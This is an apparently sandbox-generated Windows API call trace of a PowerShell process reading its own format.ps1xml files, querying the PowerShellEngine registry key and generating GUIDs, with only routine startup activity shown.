	[0770.754] ReadFile (in: hFile=0x310, lpBuffer=0x31590a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31590a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0770.754] ReadFile (in: hFile=0x310, lpBuffer=0x31590a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31590a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0770.754] ReadFile (in: hFile=0x310, lpBuffer=0x31590a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31590a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0770.755] ReadFile (in: hFile=0x310, lpBuffer=0x31590a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31590a8*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0770.755] ReadFile (in: hFile=0x310, lpBuffer=0x31590a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31590a8*, lpNumberOfBytesRead=0x1ecd98*=0xe67, lpOverlapped=0x0) returned 1
	[0770.755] ReadFile (in: hFile=0x310, lpBuffer=0x3158677, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x3158677*, lpNumberOfBytesRead=0x1ecd98*=0x0, lpOverlapped=0x0) returned 1
	[0770.755] ReadFile (in: hFile=0x310, lpBuffer=0x31590a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x31590a8*, lpNumberOfBytesRead=0x1ecd98*=0x0, lpOverlapped=0x0) returned 1
	[0770.756] CloseHandle (hObject=0x310) returned 1
	[0770.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0770.756] SetErrorMode (uMode=0x1) returned 0x1
	[0770.756] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ecd40 | out: lpFileInformation=0x1ecd40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0770.756] SetErrorMode (uMode=0x1) returned 0x1
	[0770.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0770.756] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ece28 | out: phkResult=0x1ece28*=0x310) returned 0x0
	[0770.757] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecdac, lpData=0x0, lpcbData=0x1ecda8*=0x0 | out: lpType=0x1ecdac*=0x1, lpData=0x0, lpcbData=0x1ecda8*=0x56) returned 0x0
	[0770.757] CoTaskMemAlloc (cb=0x5a) returned 0x1b3da220
	[0770.757] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecd7c, lpData=0x1b3da220, lpcbData=0x1ecd78*=0x56 | out: lpType=0x1ecd7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ecd78*=0x56) returned 0x0
	[0770.757] CoTaskMemFree (pv=0x1b3da220) 
	[0770.757] RegCloseKey (hKey=0x310) returned 0x0
	[0770.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0770.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ec920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0770.759] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x527b4eb2, Data2=0xc06a, Data3=0x405d, Data4=([0]=0xb7, [1]=0xff, [2]=0xd0, [3]=0x1, [4]=0x5, [5]=0x2f, [6]=0x9b, [7]=0x6d))) returned 0x0
	[0770.759] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xeb4b97c0, Data2=0xab9a, Data3=0x4472, Data4=([0]=0x81, [1]=0x2b, [2]=0x3, [3]=0x1, [4]=0x84, [5]=0xc1, [6]=0x74, [7]=0x20))) returned 0x0
	[0770.759] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x1daa3b77, Data2=0xfb4, Data3=0x4e9d, Data4=([0]=0xbb, [1]=0x72, [2]=0x40, [3]=0x65, [4]=0xbc, [5]=0x5b, [6]=0xac, [7]=0xa6))) returned 0x0
	[0770.759] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x61fa700a, Data2=0x1d02, Data3=0x4a53, Data4=([0]=0xb1, [1]=0x41, [2]=0x56, [3]=0x87, [4]=0x4b, [5]=0x11, [6]=0x88, [7]=0xa3))) returned 0x0
	[0770.759] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xd3b4300c, Data2=0x8ac1, Data3=0x4766, Data4=([0]=0x97, [1]=0xa, [2]=0x2e, [3]=0xfd, [4]=0x58, [5]=0x72, [6]=0xaf, [7]=0xcd))) returned 0x0
	[0770.759] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xd196eae2, Data2=0x78e4, Data3=0x4f47, Data4=([0]=0xb0, [1]=0x3b, [2]=0x58, [3]=0xd3, [4]=0x30, [5]=0x1f, [6]=0x5c, [7]=0x26))) returned 0x0
	[0770.760] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xdc659104, Data2=0x154, Data3=0x4881, Data4=([0]=0xbf, [1]=0x51, [2]=0xd8, [3]=0x88, [4]=0x34, [5]=0x30, [6]=0x12, [7]=0x3b))) returned 0x0
	[0770.760] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x899278e5, Data2=0xa506, Data3=0x4b17, Data4=([0]=0x85, [1]=0x9f, [2]=0xac, [3]=0x46, [4]=0xe, [5]=0x35, [6]=0x5b, [7]=0x73))) returned 0x0
	[0770.760] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xfea1e509, Data2=0x252b, Data3=0x49f6, Data4=([0]=0xbc, [1]=0x1f, [2]=0x14, [3]=0x3f, [4]=0xdc, [5]=0x7f, [6]=0x7, [7]=0x39))) returned 0x0
	[0770.760] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x3720e534, Data2=0xcd94, Data3=0x4f47, Data4=([0]=0x8d, [1]=0xa9, [2]=0x5b, [3]=0xbc, [4]=0x85, [5]=0xbf, [6]=0x24, [7]=0x81))) returned 0x0
	[0770.760] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xba8276a, Data2=0xa194, Data3=0x4cf3, Data4=([0]=0xb5, [1]=0x2b, [2]=0xe2, [3]=0xd0, [4]=0xd4, [5]=0xf8, [6]=0x30, [7]=0xb6))) returned 0x0
	[0770.760] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xaea86386, Data2=0x71a5, Data3=0x4f43, Data4=([0]=0x88, [1]=0xb9, [2]=0x76, [3]=0xaa, [4]=0x2d, [5]=0x64, [6]=0x65, [7]=0x1a))) returned 0x0
	[0770.760] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x21c926f8, Data2=0xa497, Data3=0x4af1, Data4=([0]=0xa3, [1]=0xde, [2]=0x3e, [3]=0x3f, [4]=0xe3, [5]=0x54, [6]=0xce, [7]=0x26))) returned 0x0
	[0770.761] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x7b41905b, Data2=0xa238, Data3=0x4ea8, Data4=([0]=0x9b, [1]=0xc5, [2]=0xb6, [3]=0x7c, [4]=0x4e, [5]=0x7d, [6]=0x86, [7]=0x8))) returned 0x0
	[0770.761] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x5237a6a7, Data2=0xbce, Data3=0x48f6, Data4=([0]=0x9a, [1]=0x15, [2]=0x67, [3]=0x39, [4]=0xd8, [5]=0xf8, [6]=0xee, [7]=0xaa))) returned 0x0
	[0770.761] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x52b30b95, Data2=0x84b7, Data3=0x4aa9, Data4=([0]=0x8c, [1]=0xac, [2]=0x1c, [3]=0x20, [4]=0x67, [5]=0xf0, [6]=0x69, [7]=0x8))) returned 0x0
	[0770.761] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x380232a0, Data2=0x16a9, Data3=0x46ee, Data4=([0]=0x92, [1]=0xbc, [2]=0x96, [3]=0xec, [4]=0xf7, [5]=0x51, [6]=0xca, [7]=0x69))) returned 0x0
	[0770.761] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xeac11c1f, Data2=0x3bb5, Data3=0x4be4, Data4=([0]=0xa7, [1]=0x92, [2]=0x97, [3]=0x91, [4]=0x20, [5]=0x38, [6]=0x58, [7]=0x4f))) returned 0x0
	[0770.761] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x53622b71, Data2=0x1897, Data3=0x4806, Data4=([0]=0xab, [1]=0x54, [2]=0x89, [3]=0xf8, [4]=0x4c, [5]=0x18, [6]=0x7a, [7]=0xd1))) returned 0x0
	[0770.762] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xc60b9c1, Data2=0x7799, Data3=0x4a88, Data4=([0]=0x87, [1]=0x9c, [2]=0x22, [3]=0x52, [4]=0x92, [5]=0xfd, [6]=0xa3, [7]=0xe9))) returned 0x0
	[0770.762] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xcefdc01d, Data2=0x89dd, Data3=0x488f, Data4=([0]=0xbc, [1]=0xc4, [2]=0xab, [3]=0x66, [4]=0xde, [5]=0x1d, [6]=0xd2, [7]=0x84))) returned 0x0
	[0770.762] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xd288c29c, Data2=0x8263, Data3=0x4630, Data4=([0]=0xb3, [1]=0x2, [2]=0xc4, [3]=0x52, [4]=0xb6, [5]=0x93, [6]=0x8f, [7]=0xfe))) returned 0x0
	[0770.762] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x84e2ab96, Data2=0xf538, Data3=0x47e0, Data4=([0]=0x80, [1]=0x8f, [2]=0xfe, [3]=0xc0, [4]=0xb9, [5]=0x2b, [6]=0x54, [7]=0x5c))) returned 0x0
	[0770.762] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x43051a32, Data2=0xf8ab, Data3=0x47f5, Data4=([0]=0xa2, [1]=0xe5, [2]=0xe0, [3]=0x5f, [4]=0xda, [5]=0x73, [6]=0x5a, [7]=0xea))) returned 0x0
	[0770.762] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x746855f2, Data2=0x8ea1, Data3=0x48c1, Data4=([0]=0x82, [1]=0x2d, [2]=0xd7, [3]=0x2a, [4]=0xb4, [5]=0xd8, [6]=0xfc, [7]=0x87))) returned 0x0
	[0770.762] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x46e8614b, Data2=0x8fbd, Data3=0x46a6, Data4=([0]=0xbe, [1]=0x79, [2]=0xf7, [3]=0x54, [4]=0x89, [5]=0x84, [6]=0x2a, [7]=0x9e))) returned 0x0
	[0770.763] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xed2624e8, Data2=0x704, Data3=0x48e5, Data4=([0]=0xbe, [1]=0x3, [2]=0x6e, [3]=0xbf, [4]=0xb8, [5]=0xb3, [6]=0x76, [7]=0x46))) returned 0x0
	[0770.763] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xea8dc7c2, Data2=0x8648, Data3=0x48fc, Data4=([0]=0xb2, [1]=0x0, [2]=0x5b, [3]=0xff, [4]=0x70, [5]=0x1b, [6]=0xf, [7]=0x4f))) returned 0x0
	[0770.763] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x45d7b513, Data2=0x43d2, Data3=0x4890, Data4=([0]=0x8e, [1]=0x9e, [2]=0x1e, [3]=0x92, [4]=0xfd, [5]=0xe9, [6]=0x53, [7]=0xa7))) returned 0x0
	[0770.763] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xe0a9d0b8, Data2=0x70f6, Data3=0x475c, Data4=([0]=0xa4, [1]=0xed, [2]=0xc, [3]=0xd7, [4]=0x64, [5]=0xd2, [6]=0xc9, [7]=0xda))) returned 0x0
	[0770.763] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xe9647da4, Data2=0x950b, Data3=0x4d2b, Data4=([0]=0x95, [1]=0xfe, [2]=0x8, [3]=0x4b, [4]=0xac, [5]=0xb1, [6]=0xad, [7]=0xb4))) returned 0x0
	[0770.763] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x27ddf2c3, Data2=0x3fb6, Data3=0x4bc3, Data4=([0]=0xac, [1]=0x7c, [2]=0x32, [3]=0x2d, [4]=0xc5, [5]=0x99, [6]=0x6, [7]=0x7c))) returned 0x0
	[0770.763] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xbf567819, Data2=0x1104, Data3=0x472f, Data4=([0]=0x97, [1]=0x57, [2]=0x75, [3]=0x5f, [4]=0x32, [5]=0x23, [6]=0x0, [7]=0xfb))) returned 0x0
	[0770.765] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x599aa07c, Data2=0xba68, Data3=0x4829, Data4=([0]=0xb7, [1]=0x3e, [2]=0xc2, [3]=0x81, [4]=0x5f, [5]=0xf0, [6]=0xb9, [7]=0x93))) returned 0x0
	[0770.765] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xb10ec153, Data2=0xc37f, Data3=0x4bb5, Data4=([0]=0xb2, [1]=0xcc, [2]=0x43, [3]=0x15, [4]=0x20, [5]=0x5, [6]=0x2f, [7]=0x61))) returned 0x0
	[0770.765] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x778c6836, Data2=0xe696, Data3=0x4699, Data4=([0]=0x8d, [1]=0x4d, [2]=0xde, [3]=0x19, [4]=0x4d, [5]=0xd3, [6]=0x76, [7]=0x7c))) returned 0x0
	[0770.765] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x1e4d3f90, Data2=0xfd6, Data3=0x4ce1, Data4=([0]=0xa8, [1]=0x71, [2]=0xf1, [3]=0x3f, [4]=0x2a, [5]=0x6, [6]=0x35, [7]=0xdb))) returned 0x0
	[0770.774] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x705fafe4, Data2=0xf8b0, Data3=0x42e3, Data4=([0]=0x99, [1]=0x66, [2]=0xcf, [3]=0xf8, [4]=0x36, [5]=0xfb, [6]=0x40, [7]=0xfe))) returned 0x0
	[0770.775] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x97a99a2a, Data2=0xd026, Data3=0x41aa, Data4=([0]=0x88, [1]=0xc4, [2]=0x9, [3]=0xda, [4]=0xd9, [5]=0xee, [6]=0x6b, [7]=0x1b))) returned 0x0
	[0770.775] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xed077acd, Data2=0x6055, Data3=0x4c72, Data4=([0]=0xbe, [1]=0x52, [2]=0x58, [3]=0x8e, [4]=0x2d, [5]=0xb9, [6]=0x99, [7]=0x5c))) returned 0x0
	[0770.776] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x390aa22a, Data2=0x3019, Data3=0x480d, Data4=([0]=0x95, [1]=0x20, [2]=0xdc, [3]=0x86, [4]=0x9b, [5]=0x92, [6]=0xac, [7]=0x17))) returned 0x0
	[0770.776] VirtualQuery (in: lpAddress=0x1eba00, lpBuffer=0x1ec8c0, dwLength=0x30 | out: lpBuffer=0x1ec8c0*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0770.779] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xa87a6fc9, Data2=0x81f2, Data3=0x4139, Data4=([0]=0xb0, [1]=0x91, [2]=0x78, [3]=0x9d, [4]=0xec, [5]=0x3d, [6]=0x37, [7]=0xe9))) returned 0x0
	[0770.780] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x4eb1d22e, Data2=0x14df, Data3=0x4b98, Data4=([0]=0x90, [1]=0x5f, [2]=0x4c, [3]=0xb7, [4]=0x53, [5]=0xfd, [6]=0xe4, [7]=0x57))) returned 0x0
	[0770.780] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x92f39abc, Data2=0x113b, Data3=0x438f, Data4=([0]=0x89, [1]=0xd7, [2]=0x23, [3]=0x49, [4]=0xe8, [5]=0x68, [6]=0xb0, [7]=0x4f))) returned 0x0
	[0770.781] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xc823aa8e, Data2=0x93c6, Data3=0x4749, Data4=([0]=0x8a, [1]=0xe8, [2]=0x28, [3]=0x6c, [4]=0xa6, [5]=0x56, [6]=0x5d, [7]=0x68))) returned 0x0
	[0770.781] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x97e5f26e, Data2=0x5235, Data3=0x4ceb, Data4=([0]=0xa1, [1]=0x9e, [2]=0x3c, [3]=0xf0, [4]=0x6e, [5]=0xc1, [6]=0xc, [7]=0x68))) returned 0x0
	[0770.781] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x324f0892, Data2=0x2645, Data3=0x4661, Data4=([0]=0x8f, [1]=0x30, [2]=0x7a, [3]=0x4b, [4]=0xbd, [5]=0x16, [6]=0x86, [7]=0x7b))) returned 0x0
	[0770.781] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0xf190cefa, Data2=0xc55b, Data3=0x4a22, Data4=([0]=0x86, [1]=0x27, [2]=0xae, [3]=0x7b, [4]=0xe0, [5]=0xa8, [6]=0x25, [7]=0xf3))) returned 0x0
	[0770.781] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310
	[0770.781] GetFileType (hFile=0x310) returned 0x1
	[0770.782] SetErrorMode (uMode=0x1) returned 0x1
	[0770.782] GetFileType (hFile=0x310) returned 0x1
	[0770.782] ReadFile (in: hFile=0x310, lpBuffer=0x2d79938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d79938*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0770.783] ReadFile (in: hFile=0x310, lpBuffer=0x2d79938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d79938*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0770.783] ReadFile (in: hFile=0x310, lpBuffer=0x2d79938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d79938*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0770.783] ReadFile (in: hFile=0x310, lpBuffer=0x2d79938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d79938*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0770.783] ReadFile (in: hFile=0x310, lpBuffer=0x2d79938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d79938*, lpNumberOfBytesRead=0x1ecd98*=0x8b4, lpOverlapped=0x0) returned 1
	[0771.427] ReadFile (in: hFile=0x310, lpBuffer=0x2d78d54, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d78d54*, lpNumberOfBytesRead=0x1ecd98*=0x0, lpOverlapped=0x0) returned 1
	[0771.427] ReadFile (in: hFile=0x310, lpBuffer=0x2d79938, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2d79938*, lpNumberOfBytesRead=0x1ecd98*=0x0, lpOverlapped=0x0) returned 1
	[0771.428] CloseHandle (hObject=0x310) returned 1
	[0771.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0771.428] SetErrorMode (uMode=0x1) returned 0x1
	[0771.428] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ecd40 | out: lpFileInformation=0x1ecd40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0771.428] SetErrorMode (uMode=0x1) returned 0x1
	[0771.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0771.429] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ece28 | out: phkResult=0x1ece28*=0x310) returned 0x0
	[0771.429] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecdac, lpData=0x0, lpcbData=0x1ecda8*=0x0 | out: lpType=0x1ecdac*=0x1, lpData=0x0, lpcbData=0x1ecda8*=0x56) returned 0x0
	[0771.429] CoTaskMemAlloc (cb=0x5a) returned 0x1b3da220
	[0771.429] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecd7c, lpData=0x1b3da220, lpcbData=0x1ecd78*=0x56 | out: lpType=0x1ecd7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ecd78*=0x56) returned 0x0
	[0771.429] CoTaskMemFree (pv=0x1b3da220) 
	[0771.429] RegCloseKey (hKey=0x310) returned 0x0
	[0771.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0771.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ec920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0771.430] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x1301d23f, Data2=0xc816, Data3=0x4e6c, Data4=([0]=0x87, [1]=0xc6, [2]=0x69, [3]=0x53, [4]=0x5c, [5]=0xcb, [6]=0x78, [7]=0x34))) returned 0x0
	[0771.430] CoCreateGuid (in: pguid=0x1ed050 | out: pguid=0x1ed050*(Data1=0x79fb4076, Data2=0x7e88, Data3=0x408c, Data4=([0]=0x92, [1]=0xc, [2]=0x87, [3]=0x97, [4]=0x86, [5]=0xde, [6]=0xbd, [7]=0x84))) returned 0x0
	[0771.430] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310
	[0771.430] GetFileType (hFile=0x310) returned 0x1
	[0771.430] SetErrorMode (uMode=0x1) returned 0x1
	[0771.430] GetFileType (hFile=0x310) returned 0x1
	[0771.430] ReadFile (in: hFile=0x310, lpBuffer=0x2db7720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2db7720*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0771.430] ReadFile (in: hFile=0x310, lpBuffer=0x2db7720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2db7720*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0771.431] ReadFile (in: hFile=0x310, lpBuffer=0x2db7720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2db7720*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0771.431] ReadFile (in: hFile=0x310, lpBuffer=0x2db7720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2db7720*, lpNumberOfBytesRead=0x1ecd98*=0x1000, lpOverlapped=0x0) returned 1
	[0771.431] ReadFile (in: hFile=0x310, lpBuffer=0x2db7720, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecd98, lpOverlapped=0x0 | out: lpBuffer=0x2db7720*, lpNumberOfBytesRead=0x1ecd98*=0xe98, lpOverlapped=0x0) returned 1
